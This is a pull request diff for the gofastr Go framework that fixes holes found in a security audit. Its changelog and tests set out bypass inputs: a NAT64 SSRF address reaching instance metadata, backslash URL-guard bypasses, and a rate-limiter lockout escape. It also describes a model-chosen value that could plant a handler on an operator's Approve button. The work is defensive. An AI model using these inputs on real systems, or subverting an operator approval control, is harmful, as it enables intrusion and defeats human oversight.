### PR TITLE
v0.64.0: security audit of the never-audited surfaces

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -7,6 +7,8 @@ stabilises). Breaking changes are clearly marked with **BREAKING**.
 
 ## [Unreleased]
 
+## [0.64.0] - 2026-08-16
+
 ### Changed
 
 - **BREAKING: `/openapi.json` path keys now carry the API prefix.** Under
@@ -73,6 +75,90 @@ stabilises). Breaking changes are clearly marked with **BREAKING**.
   `/openapi.json` and `/api/llm.md` answer 401 by default, that `/metrics`
   404s until `WithMetrics()`, and that a granular option placed before
   `WithConfig` is silently zeroed by it.
+
+### Security
+
+An audit of the packages that had no `*_security_test.go` coverage. The 194
+existing files pin what earlier passes cleared; this one worked the
+never-looked list instead. Every fix below has a test that was confirmed
+failing against the unfixed code first.
+
+- **SSRF: an IPv4-translation address reached internal space.**
+  `netguard.IsInternal` normalized only the IPv4-mapped form
+  (`::ffff:a.b.c.d`, via `net.IP.To4`), so every other encoding that resolves
+  to an IPv4 destination read as public. `64:ff9b::a9fe:a9fe` is cloud
+  instance metadata behind NAT64, and it passed both guards that use this
+  predicate: webhook subscriber registration and the harness's webfetch, at
+  registration *and* at dial time. A static AAAA record is enough — no
+  rebinding — and on an IPv6-only subnet with NAT64 (the documented AWS and
+  GCP pattern) the translator forwards to `169.254.169.254`. NAT64
+  (`64:ff9b::/96` and `64:ff9b:1::/48`), 6to4, and IPv4-compatible addresses
+  are now classified by the IPv4 they carry. Public embeddings stay external,
+  since `64:ff9b::/96` is the sanctioned egress path for IPv6-only workloads.
+
+- **A panicking fanout subscriber killed every replica.**
+  `SubscriberQueue` ran the callback bare on a framework-owned goroutine.
+  Nothing can recover a panic there — no caller frame, no middleware — so one
+  poison payload took down every process subscribed to the topic. Subscribers
+  are an extension point, and the framework already recovers around those in
+  `hook.runHookSafely`; the same rule now applies here. Proven by a test that
+  forks a child and observes real process death.
+
+- **Rate-limit keys were attacker-chosen and unbounded.** `maxKeys` capped how
+  many keys the in-memory limiter tracked, never how large one could be. The
+  per-account login limiter keys on the submitted email — deliberately, so
+  account existence cannot be probed — so the 1 MiB body cap was the only
+  bound, and one unauthenticated POST could park ~1 MiB for a full block
+  duration. Keys past 256 bytes now fold to a digest, and an address longer
+  than RFC 5321 allows is rejected before it becomes a key.
+
+- **Key-flood eviction lifted the attacker's own lockout.** The limiter's
+  low-water shed sorted by ascending `blockedUntil`, which is creation order
+  once every block shares one duration — so the oldest block, the one predating
+  the flood, went first. Burn the login budget, spray keys, walk free. Eviction
+  now sheds unblocked entries first, then the newest blocks.
+
+- **`/\evil.example` passed the URL guard.** Browsers normalize `\` to `/` at
+  the authority boundary, so `\\host`, `\/host`, and `/\host` all resolve to
+  `//host`. Only the `//` spelling was checked. `/\host` matters most: it
+  begins with `/`, so it matched the relative-reference check one line below
+  the `//` guard and reads as same-origin. Eight sinks delegate to this
+  predicate.
+
+- **A `.env` typo put a secret in the logs.** `dotenv`'s missing-`=` error
+  formatted the whole raw line, so `API_TOKEN sk-live-…` reached stderr and
+  everything behind it. Hosts wrap `LoadAndApply` in `log.Fatal`. The line
+  number stays; the line does not.
+
+- **Kiln: four holes on the agent-facing surface.** `escAttr` did not escape
+  `'` while the panel emits single-quoted attributes, so a model-chosen
+  `plan_id` planted a live event handler on the operator's Approve button —
+  the control gating destructive world edits. `/kiln/status` returned
+  `Auth.JWTSecret` and `Admin.SeedPassword` unredacted under `?fields=world`
+  and `?fields=app`, while `serveWorld` twenty lines away redacted both.
+  `set_theme` values reached `/kiln/theme.css` unvalidated, giving an agent
+  arbitrary CSS on every page. And `X-Forwarded-Host` chose a string
+  substituted into the fallback page, on a server that binds loopback and is
+  never proxied.
+
+- **The admin rendered stored media URLs without a scheme check.** Image `src`
+  and File `href` came straight from the column value — the last two dynamic
+  URL sinks in the repo not routed through `urlsafe`. Writes are validated, so
+  this is defense in depth, but seeds, migrations, and hook-written rows never
+  meet that check. Worth noting that `download` does not defuse a `javascript:`
+  href; browsers ignore it for non-http(s) schemes.
+
+- **Setup ran a wizard step while the completion probe was erroring.** An error
+  means unknown, not "not done", and that guard is the only thing between a
+  second caller and a step that usually creates the admin account. It now
+  refuses.
+
+- **`gofastr init` scaffolded `.env` world-readable.** It carries
+  `DATABASE_URL` and is the documented home of `GOFASTR_SECRET`. Now `0600`.
+
+- **`softdelete.SoftDelete` gained the unscoped-operation warning** its
+  siblings `Restore` and `HardDelete` already carried. Same shape:
+  `UPDATE … WHERE id = $1` with no tenant, owner, or access filter.
 
 ### Fixed
 

--- a/battery/admin/entity_screens.go
+++ b/battery/admin/entity_screens.go
@@ -26,6 +26,7 @@ import (
 	"github.com/DonaldMurillo/gofastr/core-ui/html"
 	"github.com/DonaldMurillo/gofastr/core-ui/interactive"
 	"github.com/DonaldMurillo/gofastr/core-ui/patterns/pagination"
+	"github.com/DonaldMurillo/gofastr/core-ui/urlsafe"
 	"github.com/DonaldMurillo/gofastr/core/render"
 	"github.com/DonaldMurillo/gofastr/core/schema"
 	"github.com/DonaldMurillo/gofastr/framework/entity"
@@ -516,17 +517,34 @@ func formatValue(col string, ft schema.FieldType, raw any, relLabels map[string]
 	case schema.Image:
 		// Thumbnail in the list, larger preview in detail. src is the stored
 		// URL/path; alt is the column for a non-empty accessible name.
+		//
+		// The stored value is scheme-checked on write (crud.validateMediaURLs
+		// covers create/update/upsert/batch), but this render path is the
+		// last hop before it becomes a live attribute, and it was the only
+		// dynamic href/src sink in the repo not going through the guard.
+		// Seeded, migrated, and hook-written rows never met the write check.
+		src := urlsafe.Clean(val, urlsafe.Resource)
+		if src == "" {
+			return render.Tag("span", map[string]string{"class": "admin-muted"}, render.Text("—"))
+		}
 		cls := "admin-thumb"
 		if detail {
 			cls += " admin-thumb--lg"
 		}
-		return render.VoidTag("img", map[string]string{"class": cls, "src": val, "alt": col, "loading": "lazy"})
+		return render.VoidTag("img", map[string]string{"class": cls, "src": src, "alt": col, "loading": "lazy"})
 	case schema.File:
 		name := val
 		if i := strings.LastIndexAny(val, "/\\"); i >= 0 && i < len(val)-1 {
 			name = val[i+1:]
 		}
-		return render.Tag("a", map[string]string{"class": "admin-file", "href": val, "download": "", "rel": "noopener"}, render.Text(name))
+		// `download` does not defuse a javascript: href — browsers ignore
+		// the attribute for non-http(s) schemes — so an unguarded stored
+		// value here would execute in the admin's origin on click.
+		href := urlsafe.Clean(val, urlsafe.Resource)
+		if href == "" {
+			return render.Tag("span", map[string]string{"class": "admin-muted"}, render.Text(name))
+		}
+		return render.Tag("a", map[string]string{"class": "admin-file", "href": href, "download": "", "rel": "noopener"}, render.Text(name))
 	case schema.JSON:
 		if detail {
 			return render.Tag("pre", map[string]string{"class": "admin-json"},

--- a/battery/auth/form_decode.go
+++ b/battery/auth/form_decode.go
@@ -83,6 +83,9 @@ func decodeAuthCredentials(w http.ResponseWriter, r *http.Request) (email, passw
 		}
 		email = r.PostFormValue("email")
 		password = r.PostFormValue("password")
+		if !emailWithinLimit(w, email) {
+			return "", "", true, false
+		}
 		return email, password, true, true
 	}
 
@@ -93,7 +96,29 @@ func decodeAuthCredentials(w http.ResponseWriter, r *http.Request) (email, passw
 	if !decodeJSONLimited(w, r, &body) {
 		return "", "", false, false
 	}
+	if !emailWithinLimit(w, body.Email) {
+		return "", "", false, false
+	}
 	return body.Email, body.Password, false, true
+}
+
+// maxEmailLen is RFC 5321's 254-octet ceiling on a forward-path address.
+const maxEmailLen = 254
+
+// emailWithinLimit rejects an address longer than any real one can be.
+//
+// This is not cosmetic validation. The submitted address becomes the
+// per-account rate-limiter key in the login handler and a user-table
+// value in register, so without a bound here maxAuthBodyBytes (1 MiB)
+// is the only limit on how much state one unauthenticated request can
+// park in either. Length does not depend on whether the account exists,
+// so rejecting here opens no account-existence oracle.
+func emailWithinLimit(w http.ResponseWriter, email string) bool {
+	if len(email) > maxEmailLen {
+		writeAuthError(w, http.StatusBadRequest, "invalid email")
+		return false
+	}
+	return true
 }
 
 // successRedirect returns the redirect target for a form-based auth

--- a/battery/setup/handler.go
+++ b/battery/setup/handler.go
@@ -237,8 +237,17 @@ func (r *Runner) runStepSerialized(ctx context.Context, stepIdx int, step Step, 
 
 	// Re-check Complete: if setup already finished (concurrent path),
 	// don't re-run.
+	//
+	// A probe ERROR is not "not done" — it is "unknown", and this guard is
+	// the only thing standing between a second caller and a re-run of a
+	// step that typically creates the admin account. Refuse rather than
+	// proceed: a failed setup step is recoverable, a silently re-run one
+	// is not.
 	done, err := r.cfg.Complete(ctx)
-	if err == nil && done {
+	if err != nil {
+		return fmt.Errorf("setup: completion check failed, refusing to run step: %w", err)
+	}
+	if done {
 		return nil
 	}
 

--- a/battery/setup/handler_security_test.go
+++ b/battery/setup/handler_security_test.go
@@ -1,0 +1,63 @@
+package setup
+
+import (
+	"context"
+	"errors"
+	"net/url"
+	"sync/atomic"
+	"testing"
+)
+
+// Property: the wizard must not execute a step while the completion
+// probe's answer is UNKNOWN — a Complete predicate that returns an
+// error means the framework cannot tell whether the app is already
+// set up, so running bootstrap steps (e.g. AdminStep → CreateUser)
+// in that state can mint a second admin on an already-configured app.
+//
+// Surfaces (both fail closed only when Complete says false; an error
+// is currently treated as "not done" and execution proceeds):
+//   - Runner.serve → handleSetup: `if err == nil && done && !force`
+//     falls through to POST handling on a probe error.
+//   - Runner.handleSubmit → runStepSerialized: `if err == nil && done`
+//     skips the already-complete short-circuit on a probe error and
+//     runs step.Run anyway.
+//
+// Attack path: an app deployed with DisableToken (documented
+// "trusted network" posture) or any deployment where the attacker
+// holds the setup cookie, plus a Complete probe that errors exactly
+// while the users table already has rows (e.g. restored DB, probe
+// flap). The POST executes AdminStep.Run with attacker-chosen
+// credentials.
+func TestSetupProbeErrorFailsClosed(t *testing.T) {
+	var runs int32
+	r := New(Config{
+		DisableToken: true, // isolate the probe-error property from the token gate
+		Steps: []Step{{
+			Name: "Create Admin",
+			Fields: []Field{{
+				Name:     "ADMIN_EMAIL",
+				Label:    "Admin email",
+				EnvVar:   "GOFASTR_ADMIN_EMAIL",
+				Validate: func(string) error { return nil },
+			}},
+			Run: func(context.Context, map[string]string) error {
+				atomic.AddInt32(&runs, 1)
+				return nil
+			},
+		}},
+		// The probe is DOWN: unknown, not "incomplete". The wizard must
+		// not run steps while it cannot know whether setup already
+		// finished.
+		Complete: func(context.Context) (bool, error) {
+			return false, errors.New("probe unreachable")
+		},
+	})
+	h := r.Handler(func() {}, nil, nil)
+
+	form := url.Values{"ADMIN_EMAIL": {"attacker@example.com"}}
+	w := doPost(h, "/setup", form.Encode(), nil)
+
+	if atomic.LoadInt32(&runs) != 0 {
+		t.Fatalf("step.Run executed %d time(s) while the completion probe errored — probe error must fail closed (status %d)", runs, w.Code)
+	}
+}

--- a/battery/setup/integration_test.go
+++ b/battery/setup/integration_test.go
@@ -580,9 +580,14 @@ func TestSwap_CompleteStuckFalseIsHonest(t *testing.T) {
 	}
 }
 
-// A transient Complete ERROR at the final re-check must also be honest and
-// recoverable: the error is shown, and a later request (predicate healed)
-// completes and swaps — no restart required.
+// A transient Complete ERROR must be honest and recoverable: the error is
+// shown, and once the predicate heals the flow finishes without a restart.
+//
+// It must ALSO be fail-closed. A probe error means "unknown", not "not
+// done", so the step does not run while the probe is erroring — this test
+// previously relied on it running anyway and healing into completion, which
+// would re-run admin creation on a boot where setup was already complete but
+// the probe was failing. Recovery is now: heal, re-submit, complete.
 func TestSwap_CompleteErrorRecovers(t *testing.T) {
 	var swapped int32
 	var failing atomic.Bool
@@ -607,12 +612,15 @@ func TestSwap_CompleteErrorRecovers(t *testing.T) {
 	if strings.Contains(w.Body.String(), "Setup Complete") || atomic.LoadInt32(&swapped) != 0 {
 		t.Fatal("completion must not be claimed while the Complete check errors")
 	}
+	if ran {
+		t.Fatal("step ran while the Complete probe errored — unknown state must fail closed")
+	}
 
-	// Predicate heals; a plain GET /setup now completes and swaps.
+	// Predicate heals; re-submitting now runs the step and completes.
 	failing.Store(false)
-	w = doGet(h, "/setup")
+	w = doPost(h, "/setup", "NAME=alice", nil)
 	if atomic.LoadInt32(&swapped) != 1 {
-		t.Fatalf("healed Complete on a later request must fire the swap (code %d)", w.Code)
+		t.Fatalf("healed Complete on a later submit must fire the swap (code %d)", w.Code)
 	}
 	if !strings.Contains(w.Body.String(), "Setup Complete") {
 		t.Fatal("healed request should render the completion page")

--- a/cmd/gofastr/init.go
+++ b/cmd/gofastr/init.go
@@ -145,7 +145,13 @@ PORT=localhost:8080
 	// embed a password) and is where the operator is told to put
 	// GOFASTR_SECRET, the session-signing key. Scaffolding it
 	// world-readable hands every local account the app's secrets.
-	if err := os.WriteFile(filepath.Join(name, ".env"), []byte(envContent), 0o600); err != nil {
+	//
+	// os.WriteFile applies its mode only when CREATING the file — on an
+	// existing one it truncates and leaves the mode alone. `gofastr init .`
+	// runs in a directory that may already hold a 0644 .env, so the mode is
+	// set explicitly, and set BEFORE the write, so no secret is ever on disk
+	// while the file is world-readable.
+	if err := writeEnvFile(filepath.Join(name, ".env"), envContent); err != nil {
 		fail("Failed to write .env: %v", err)
 		osExit(1)
 	}
@@ -493,6 +499,32 @@ func getEnv(key, fallback string) string {
 		fail("Failed to write main.go: %v", err)
 		osExit(1)
 	}
+}
+
+// writeEnvFile writes the scaffolded .env with owner-only permissions,
+// tightening an existing file's mode before any content lands.
+//
+// The order is the point. os.WriteFile would truncate a pre-existing 0644
+// file and write the secrets into it while it is still world-readable, then
+// leave it that way — so the mode is fixed first, on the open handle, and
+// the write happens after.
+func writeEnvFile(path, content string) error {
+	f, err := os.OpenFile(path, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0o600)
+	if err != nil {
+		return err
+	}
+	// Chmod on the handle, not the path: it cannot be redirected by a
+	// symlink swapped in between the open and the mode change, and it
+	// corrects a file that already existed with a looser mode.
+	if err := f.Chmod(0o600); err != nil {
+		f.Close()
+		return err
+	}
+	if _, err := f.WriteString(content); err != nil {
+		f.Close()
+		return err
+	}
+	return f.Close()
 }
 
 func writeIsolationConfig(name, _ string) {

--- a/cmd/gofastr/init.go
+++ b/cmd/gofastr/init.go
@@ -141,7 +141,11 @@ DATABASE_URL=%s
 PORT=localhost:8080
 `, dbURL)
 	}
-	if err := os.WriteFile(filepath.Join(name, ".env"), []byte(envContent), 0o644); err != nil {
+	// 0600, not 0644: this file already carries DATABASE_URL (which may
+	// embed a password) and is where the operator is told to put
+	// GOFASTR_SECRET, the session-signing key. Scaffolding it
+	// world-readable hands every local account the app's secrets.
+	if err := os.WriteFile(filepath.Join(name, ".env"), []byte(envContent), 0o600); err != nil {
 		fail("Failed to write .env: %v", err)
 		osExit(1)
 	}

--- a/cmd/gofastr/init_envperm_security_test.go
+++ b/cmd/gofastr/init_envperm_security_test.go
@@ -1,0 +1,63 @@
+package main
+
+import (
+	"os"
+	"path/filepath"
+	"runtime"
+	"testing"
+)
+
+// Property: the scaffolded .env is never readable by anyone but its owner.
+//
+// It carries DATABASE_URL and is the documented home of GOFASTR_SECRET, the
+// session-signing key.
+//
+// The pre-existing case is the one that matters: os.WriteFile applies its
+// mode only when it CREATES a file, so `gofastr init .` in a directory that
+// already holds a 0644 .env would have truncated it, written the secrets in,
+// and left it world-readable — the permission argument silently doing
+// nothing on exactly the path where it was needed.
+func TestEnvFileIsOwnerOnly(t *testing.T) {
+	if runtime.GOOS == "windows" {
+		t.Skip("Unix permission bits")
+	}
+	for _, tc := range []struct {
+		name    string
+		preMode os.FileMode // 0 = no pre-existing file
+	}{
+		{"new file", 0},
+		{"pre-existing world-readable", 0o644},
+		{"pre-existing group-writable", 0o664},
+	} {
+		t.Run(tc.name, func(t *testing.T) {
+			path := filepath.Join(t.TempDir(), ".env")
+			if tc.preMode != 0 {
+				if err := os.WriteFile(path, []byte("STALE=1\n"), tc.preMode); err != nil {
+					t.Fatal(err)
+				}
+				if err := os.Chmod(path, tc.preMode); err != nil {
+					t.Fatal(err) // defeat umask so the precondition is exact
+				}
+			}
+
+			if err := writeEnvFile(path, "GOFASTR_SECRET=shhh\n"); err != nil {
+				t.Fatalf("writeEnvFile: %v", err)
+			}
+
+			info, err := os.Stat(path)
+			if err != nil {
+				t.Fatal(err)
+			}
+			if got := info.Mode().Perm(); got&0o077 != 0 {
+				t.Errorf("SECURITY: .env is %04o — readable beyond its owner", got)
+			}
+			body, err := os.ReadFile(path)
+			if err != nil {
+				t.Fatal(err)
+			}
+			if string(body) != "GOFASTR_SECRET=shhh\n" {
+				t.Errorf("content = %q, want the new content with no stale remnant", body)
+			}
+		})
+	}
+}

--- a/cmd/gofastr/upgrades.yml
+++ b/cmd/gofastr/upgrades.yml
@@ -19,7 +19,7 @@
 # The registry is complete through this release: releases ≤ through
 # with no entry below genuinely had no migration-relevant changes.
 # Targets beyond it make the CLI warn that it may be out of date.
-through: v0.63.0
+through: v0.64.0
 
 releases:
   - version: v0.3.0
@@ -686,3 +686,24 @@ releases:
         breaking: false
         guidance: "The import path is unchanged, but the package now lives in its own Go module. Apps that import it add the module explicitly: go get github.com/DonaldMurillo/gofastr/battery/print/chromepdf@latest. Apps that do not import chromepdf need nothing."
         detect: "battery/print/chromepdf"
+
+  - version: v0.64.0
+    title: OpenAPI path keys, bound idempotency writes, never-audited surfaces
+    notes:
+      - change: /openapi.json path keys carry the API prefix
+        breaking: true
+        guidance: "Under WithAPIPrefix(\"/api\") the document now keys operations /api/posts with servers [{url: \"/\"}], where it keyed them /posts with servers [{url: \"/api\"}] before. Both compose to the same URL, so Swagger UI and servers-aware SDK generators are unaffected. A consumer that concatenated servers[0].url onto each path key must drop the concatenation."
+        detect: "servers\\[0\\]\\.url"
+      - change: IdempotencyStore.Finish takes the request fingerprint
+        breaking: true
+        guidance: "The signature is now Finish(ctx, key, fingerprint string, resp *IdempotentResponse) error. Custom stores must accept the fingerprint and refuse to write a row that no longer carries it — a store that ignores it can serve one principal's response to another. Built-in stores need no change."
+        detect: "Finish\\(ctx context\\.Context, key string, resp"
+      - change: An email longer than RFC 5321 allows is rejected at login and register
+        breaking: false
+        guidance: "Addresses past 254 octets now get a 400 instead of becoming a rate-limiter key and a user-table value. The submitted email keys the per-account limiter, so without the bound one unauthenticated POST could park ~1 MiB of limiter state. No legitimate address is affected."
+      - change: IPv4-translation addresses count as internal for SSRF guards
+        breaking: false
+        guidance: "netguard.IsInternal now classifies NAT64 (64:ff9b::/96, 64:ff9b:1::/48), 6to4, and IPv4-compatible addresses by the IPv4 they carry, so 64:ff9b::a9fe:a9fe is instance metadata rather than a public host. Webhook subscriber URLs and harness webfetch targets that resolved to one of these and previously worked will now be refused — which is the point. Public embeddings still pass."
+      - change: gofastr init scaffolds .env as 0600
+        breaking: false
+        guidance: "New projects only; existing files are untouched. The file carries DATABASE_URL and is where GOFASTR_SECRET goes, so a world-readable scaffold handed both to every local account. Run chmod 600 .env on projects scaffolded earlier."

--- a/core-ui/urlsafe/urlsafe.go
+++ b/core-ui/urlsafe/urlsafe.go
@@ -75,6 +75,17 @@ func OK(u string, p Policy) bool {
 	if strings.Contains(low, "%0d") || strings.Contains(low, "%0a") {
 		return false
 	}
+	// Browsers normalize '\' to '/' at the authority boundary for special
+	// schemes, so `\\host`, `\/host` and `/\host` all resolve to `//host`
+	// — the protocol-relative form rejected just below. `/\host` is the
+	// dangerous spelling: it starts with '/', so it would otherwise pass
+	// the relative-reference check and read as same-origin to anyone
+	// eyeballing it. No reference this package should pass contains a
+	// backslash, so reject it outright — the same posture as
+	// core-ui/app.redirect and core-ui/uinodev1.IsValidHostRelative.
+	if strings.IndexByte(trimmed, '\\') >= 0 {
+		return false
+	}
 	if strings.HasPrefix(trimmed, "//") {
 		return false
 	}

--- a/core-ui/urlsafe/urlsafe_test.go
+++ b/core-ui/urlsafe/urlsafe_test.go
@@ -23,6 +23,13 @@ func TestRejectedUnderEveryPolicy(t *testing.T) {
 		{"view-source:https://x", "view-source scheme"},
 		{"chrome://settings", "browser-internal scheme"},
 		{"//evil.example/x", "protocol-relative inherits the page scheme"},
+		// Browsers normalize '\' to '/' at the authority boundary, so each
+		// of these is //evil.example by the time it is resolved. `/\` is
+		// the one that matters most: it starts with '/', so before the
+		// backslash rule it passed as an ordinary relative reference.
+		{"\\\\evil.example/x", "double backslash normalizes to protocol-relative"},
+		{"\\/evil.example/x", "backslash-slash normalizes to protocol-relative"},
+		{"/\\evil.example/x", "slash-backslash normalizes to protocol-relative"},
 		{"/x\x00y", "NUL byte"},
 		{"/x\ny", "raw LF splits the attribute"},
 		{"/x\ry", "raw CR splits the attribute"},

--- a/core/dotenv/dotenv.go
+++ b/core/dotenv/dotenv.go
@@ -58,7 +58,13 @@ func Parse(r io.Reader) (map[string]string, error) {
 		}
 		eq := strings.IndexByte(trimmed, '=')
 		if eq < 0 {
-			return nil, fmt.Errorf("dotenv: line %d: missing '=' in %q", lineNum, raw)
+			// The line number locates the problem; the line itself is a
+			// secret. A .env holds credentials by definition, and hosts
+			// wrap LoadAndApply in log.Fatal, so echoing the raw line
+			// puts "API_TOKEN sk-live-..." (the exact typo this branch
+			// catches) into stderr. The sibling branches below already
+			// name only the key or the shape — match them.
+			return nil, fmt.Errorf("dotenv: line %d: missing '='", lineNum)
 		}
 		key := strings.TrimSpace(trimmed[:eq])
 		if !isValidKey(key) {

--- a/core/dotenv/dotenv_security_test.go
+++ b/core/dotenv/dotenv_security_test.go
@@ -1,0 +1,59 @@
+package dotenv
+
+import (
+	"strings"
+	"testing"
+)
+
+// Property: a parse error reports WHERE the file is wrong without echoing
+// WHAT the file contains. A .env is by definition secrets; the error
+// string travels to callers that log it verbatim (host apps wrap
+// LoadAndApply in log.Fatal), so a malformed line's payload must not ride
+// along into the log.
+//
+// The missing-'=' branch quoted the whole raw line. The realistic shape is
+// a secret typed with a space or a missing equals — exactly the line whose
+// value must not reach stderr.
+func TestParseErrorDoesNotEchoValue(t *testing.T) {
+	cases := []struct {
+		name string
+		in   string
+	}{
+		{"missing equals leaks the secret", "API_TOKEN sk-live-QQ77zzWWvvUU11223344\n"},
+		{"space instead of equals", "PASSWORD hunter2 with spaces\n"},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			_, err := Parse(strings.NewReader(tc.in))
+			if err == nil {
+				t.Fatalf("expected a parse error for %q", tc.in)
+			}
+			// The raw payload (everything after the key) must not appear.
+			if strings.Contains(err.Error(), "sk-live-QQ77") ||
+				strings.Contains(err.Error(), "hunter2") {
+				t.Errorf("SECURITY: [dotenv] parse error echoes file content: %v", err)
+			}
+		})
+	}
+}
+
+// The happy-path error surfaces that already avoid echoing: an invalid key
+// names the key only, an unterminated quote names the shape only. Pin them
+// so a refactor cannot regress the branches that are already clean.
+func TestParseErrorNamesShapeNotContent(t *testing.T) {
+	_, err := Parse(strings.NewReader("BAD-KEY=\"some long secret value\""))
+	if err == nil {
+		t.Fatal("expected invalid-key error")
+	}
+	if strings.Contains(err.Error(), "some long secret value") {
+		t.Errorf("invalid-key error echoes the value: %v", err)
+	}
+
+	_, err = Parse(strings.NewReader("MSG=\"never closed\n"))
+	if err == nil {
+		t.Fatal("expected unterminated-quote error")
+	}
+	if strings.Contains(err.Error(), "never closed") {
+		t.Errorf("unterminated-quote error echoes the value: %v", err)
+	}
+}

--- a/core/fanout/subscriber_queue.go
+++ b/core/fanout/subscriber_queue.go
@@ -1,6 +1,30 @@
 package fanout
 
-import "sync"
+import (
+	"log/slog"
+	"sync"
+)
+
+// deliver runs one subscriber callback with panic isolation, mirroring
+// [framework/hook].runHookSafely: a subscriber is an extension point, and
+// third-party code at an extension point must not be able to take the
+// process down.
+//
+// This goroutine is framework-owned and has no caller frame to unwind
+// into, so an unrecovered panic here is fatal — no HTTP middleware
+// recover can see it. In a multi-replica deployment every replica
+// subscribes to the same topic, so one poison payload would take down
+// the whole fleet at once. Dropping the payload and continuing keeps the
+// blast radius at one message.
+func deliver(fn func([]byte), p []byte) {
+	defer func() {
+		if r := recover(); r != nil {
+			slog.Error("fanout: subscriber panicked — payload dropped",
+				slog.Any("panic", r))
+		}
+	}()
+	fn(p)
+}
 
 // SubscriberQueue wraps a subscriber callback in a per-subscriber bounded
 // queue with drop-oldest overflow, running fn on a dedicated goroutine.
@@ -32,7 +56,7 @@ func SubscriberQueue(fn func([]byte), depth int) (send func([]byte), stop func()
 			case <-stopped:
 				return
 			case p := <-q:
-				fn(p)
+				deliver(fn, p)
 			}
 		}
 	}()

--- a/core/fanout/subscriber_queue_security_test.go
+++ b/core/fanout/subscriber_queue_security_test.go
@@ -1,0 +1,90 @@
+package fanout
+
+import (
+	"context"
+	"os"
+	"os/exec"
+	"strings"
+	"sync/atomic"
+	"testing"
+	"time"
+)
+
+// Property: panic isolation at extension points. A panicking subscriber
+// callback is third-party code running on a goroutine the framework owns
+// (SubscriberQueue); an unrecovered panic there terminates the whole
+// process — the same class framework/hook guards with runHookSafely.
+//
+// Surfaces routed through core/fanout.SubscriberQueue (all share this
+// primitive, so the property is proven once at the primitive and once
+// end-to-end through InProcess):
+//   - InProcess.Subscribe
+//   - redisFanout.Subscribe (NewRedis)
+//   - PostgresFanout.Subscribe (framework/fanout)
+//   - PublishQueue (its drain goroutine calls fn too)
+//
+// Proven by re-exec: the child process subscribes a callback that panics on
+// the first payload, publishes two payloads, and must exit 0. Today the
+// first panic kills the child (unrecovered goroutine panic), so the parent
+// observes a crash exit — the failing assertion.
+
+const panicChildEnv = "GOFASTR_TEST_FANOUT_PANIC_CHILD"
+
+func TestSubscriberPanicDoesNotKillProcess(t *testing.T) {
+	if os.Getenv(panicChildEnv) == "1" {
+		subscriberPanicChild()
+		return // unreachable; subscriberPanicChild exits
+	}
+
+	cmd := exec.Command(os.Args[0],
+		"-test.run", "^TestSubscriberPanicDoesNotKillProcess$",
+		"-test.count=1")
+	cmd.Env = append(os.Environ(), panicChildEnv+"=1")
+	out, err := cmd.CombinedOutput()
+	if err != nil {
+		t.Fatalf("subscriber panic killed the process: %v\n--- child output ---\n%s",
+			err, out)
+	}
+	if strings.Contains(string(out), "panic:") {
+		t.Fatalf("child reported a panic:\n%s", out)
+	}
+}
+
+// subscriberPanicChild is the child-side scenario. It never returns.
+func subscriberPanicChild() {
+	var hits atomic.Int32
+	delivered := make(chan struct{}, 1)
+
+	f := NewInProcess()
+	cancel, err := f.Subscribe("orders", func(payload []byte) {
+		n := hits.Add(1)
+		if n == 1 {
+			// A third-party subscriber bug: bad cast, nil map write, index
+			// out of range on a payload an attacker influenced.
+			panic("subscriber bug on first payload")
+		}
+		delivered <- struct{}{}
+	})
+	if err != nil {
+		os.Exit(10)
+	}
+	defer cancel()
+
+	// First publish: the callback panics inside the queue goroutine.
+	// Without recover() this terminates the process (exit status 2).
+	if err := f.Publish(context.Background(), "orders", []byte(`{"a":1}`)); err != nil {
+		os.Exit(11)
+	}
+	// Second publish: proves the subscriber goroutine (and the fanout)
+	// survived the first panic and kept delivering.
+	if err := f.Publish(context.Background(), "orders", []byte(`{"a":2}`)); err != nil {
+		os.Exit(12)
+	}
+	select {
+	case <-delivered:
+		os.Exit(0)
+	case <-time.After(5 * time.Second):
+		// Goroutine died or stalled: second payload never delivered.
+		os.Exit(13)
+	}
+}

--- a/core/netguard/netguard.go
+++ b/core/netguard/netguard.go
@@ -104,8 +104,13 @@ func translatedV4(ip net.IP) net.IP {
 	}
 	switch {
 	case ip[0] == 0x00 && ip[1] == 0x64 && ip[2] == 0xff && ip[3] == 0x9b:
-		// RFC 8215 local-use 64:ff9b:1::/48 — u octet must be zero.
-		if ip[4] == 0x00 && ip[5] == 0x01 && ip[8] == 0x00 {
+		// RFC 8215 local-use 64:ff9b:1::/48. The u octet (byte 8) must be
+		// zero, and so must the 40-bit suffix (bytes 11-15) — RFC 6052
+		// §2.2 defines both as zero for a canonical embedding. Checking
+		// the suffix keeps an unrelated address that merely shares the
+		// prefix, such as 64:ff9b:1:a9fe:a9:fe00:0:1, from being read as
+		// an embedded IPv4 and refused.
+		if ip[4] == 0x00 && ip[5] == 0x01 && ip[8] == 0x00 && isZero(ip[11:]) {
 			return net.IPv4(ip[6], ip[7], ip[9], ip[10])
 		}
 		// RFC 6052 well-known 64:ff9b::/96.

--- a/core/netguard/netguard.go
+++ b/core/netguard/netguard.go
@@ -35,7 +35,9 @@ var metadataIPv4 = net.IPv4(169, 254, 169, 254)
 //
 // IPv4-mapped IPv6 addresses (`::ffff:a.b.c.d`) are normalized to their
 // 4-byte form first, so a mapped internal literal cannot slip past the
-// v4 range checks.
+// v4 range checks. Addresses in an IPv4-*translation* prefix (NAT64,
+// 6to4, IPv4-compatible) are checked against the IPv4 they carry — see
+// [translatedV4].
 func IsInternal(ip net.IP) bool {
 	if ip == nil {
 		// A caller with no address to check has nothing to vouch for.
@@ -44,6 +46,24 @@ func IsInternal(ip net.IP) bool {
 	if v4 := ip.To4(); v4 != nil {
 		ip = v4
 	}
+	if internalRange(ip) {
+		return true
+	}
+	// Not internal as written. If it is a translation address, it is only
+	// as safe as the IPv4 it carries: a NAT64 translator on the path will
+	// forward to that IPv4. Checked AFTER the direct ranges so `::` and
+	// `::1` are classified by their own rules rather than by the
+	// all-zero IPv4-compatible payload they would otherwise decode to.
+	if v4 := translatedV4(ip); v4 != nil {
+		return internalRange(v4)
+	}
+	return false
+}
+
+// internalRange is the range check itself, shared by IsInternal and
+// Reason so the predicate and its diagnostic can never disagree — the
+// drift this package was created to end.
+func internalRange(ip net.IP) bool {
 	switch {
 	case ip.IsUnspecified(),
 		ip.IsLoopback(),
@@ -60,6 +80,58 @@ func IsInternal(ip net.IP) bool {
 	return ip.Equal(metadataIPv4)
 }
 
+// translatedV4 returns the IPv4 address carried by an IPv4-translation
+// IPv6 address, or nil when ip is not one.
